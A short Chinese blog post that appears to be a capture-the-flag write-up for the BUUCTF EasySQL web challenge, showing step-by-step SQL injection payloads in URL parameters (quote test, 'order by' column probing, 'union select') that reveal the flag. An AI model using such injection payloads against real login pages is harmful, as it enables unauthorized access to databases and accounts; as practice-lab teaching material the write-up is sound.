还在加载 请稍等一下辣ヾ(≧▽≦*)o . . .

Buuctf-Web-[极客大挑战 2019]EasySQL


前言

刷题网址:https://buuoj.cn/challenges


首先在网页测试输入admin,admin,如下图,发现是GET传输

然后在后面输入一个',之后发现报错,如下图。

payload是:?username=admin&password=admin'

payload是:?username=admin&password=admin' order by 5%23

因为是GET传参,所以#编码之后是%23,如下图

经过测试,发现是有三个字段的,如下图

payload是:?username=admin&password=admin' order by 3

但是要查3个字段的时候发现flag直接出来了,如下图

payload是:?username=admin&password=admin' union select 1,2,3%23


文章作者: Kenken
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Kenken !
评论
  目录